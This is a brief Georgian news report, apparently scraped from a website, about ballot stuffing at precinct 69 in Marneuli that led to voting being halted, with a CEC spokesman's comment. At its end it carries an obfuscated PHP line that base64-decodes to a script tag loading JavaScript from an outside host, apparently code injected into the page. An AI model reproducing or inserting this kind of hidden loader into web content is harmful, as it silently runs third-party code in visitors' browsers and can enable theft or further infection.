celsiusi
ავერსი საქკაბელი
მარნეულში 69-ე უბანზე, სადაც მოქალაქეებმა საარჩევნო ყუთში ბიულეტენები ჩაყარეს, კენჭისყრის პროცესი შეწყდა.
როგორც ცესკოს წარმომადგენელმა იაკობ ასანიძემ ჟურნალისტებს უთხრა, საოლქო საარჩევნო კომისია შესაბამის გადაწყვეტილებას მიიღებს.
„საოლქო საარჩევნო კომისია უახლოეს ხანებში მიიღებს შესაბამის გადაწყვეტილებას. კენჭისყრის პროცესი შეწყვეტილია“, - თქვა იაკობ ასანიძემ.
ცნობისთვის, სადამკვირვებლო მისია „ჩემი ხმა“ სოციალურ ქსელში ავრცელებს ვიდეოს, სადაც ჩანს, რომ მარნეულში, საარჩევნო ურნაში ყრიან ბიულეტენებს.

74
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");